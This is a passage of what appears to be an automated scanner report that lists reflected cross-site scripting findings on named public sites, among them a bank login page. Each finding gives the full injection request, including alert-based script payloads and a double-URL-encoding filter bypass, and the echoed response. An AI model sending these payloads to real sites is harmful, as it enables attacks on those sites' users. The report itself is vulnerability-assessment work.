Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1";
ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack";
ipb.sharelinks.bname = "Invision Power Services";
</script>
...[SNIP]...
2.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://community.invisionpower.com
Path: /resources/documentation/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' />
...[SNIP]...
2.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' />
...[SNIP]...
2.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' /> ...[SNIP]...
2.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' /> ...[SNIP]...
2.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' /> ...[SNIP]...
2.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://community.invisionpower.com
Path: /resources/official.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:09 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:12 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan"> ...[SNIP]...
2.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
2.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- function GoPage(page) { var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
2.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/
Date: Wed, 02 Feb 2011 21:59:59 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1'; strHref = strHref.toLowerCase() if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 ) { v ...[SNIP]...
2.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33648
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close
<script type="text/javascript"> alert ("Special Characters are not allowed."); location.href = "http://www.bankofamerica.com"; </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr ...[SNIP]... <a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1"> ...[SNIP]...
2.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.wachovia.com
Path: /selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 22:02:36 GMT
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware"> ...[SNIP]...
2.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.wareseeker.com
Path: /ip-board/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "wareseekercom"; t.adSpace = "ros66ae8<a>a5a81e35302"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/
Connection: close
Content-Length: 73997
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 02:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 02:15:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/
Connection: close
Content-Length: 76050
